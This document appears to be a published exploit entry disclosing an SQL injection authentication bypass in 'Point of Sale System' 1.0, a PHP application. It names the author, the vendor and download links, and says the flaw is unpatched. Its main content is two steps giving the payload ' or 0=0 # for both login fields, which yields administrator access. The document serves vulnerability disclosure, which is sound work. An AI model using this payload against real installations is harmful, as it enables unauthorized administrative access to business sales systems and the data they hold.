Point of Sale System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
596041ae8cbbc85b9ca314b28ed7b2500dcc7ec7e8554b5e0528440f9a3adb54
# Exploit Title: Point of Sale System 1.0 - Authentication Bypass
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-17
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as Administrator.
Step 1: On the login page, simply use { ' or 0=0 # } as username
Step 2: On the login page, use same query{ ' or 0=0 # } as password
All set you should be logged in as Administrator.